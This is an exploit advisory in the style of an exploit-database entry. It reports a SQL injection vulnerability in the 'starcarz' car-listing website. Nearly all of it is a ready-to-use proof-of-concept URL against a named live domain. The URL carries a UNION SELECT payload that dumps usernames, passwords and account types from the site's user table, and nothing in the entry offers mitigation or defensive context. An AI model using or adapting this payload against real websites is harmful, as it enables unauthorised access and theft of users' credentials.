-------------------------------------------------------------*
#Exploit Title: starcarz - SQL Injection vulnerability
#Date: 2020-10-06
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://www.starcarz.in/single-car.php?id=-4926%20union%20select%201,2,3,4,5,6,group_concat(username,0x3a,password,0x3a,type,%27%3Cbr%3E%27),8,9,10,11,12,13%20from%20user_final%20--
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*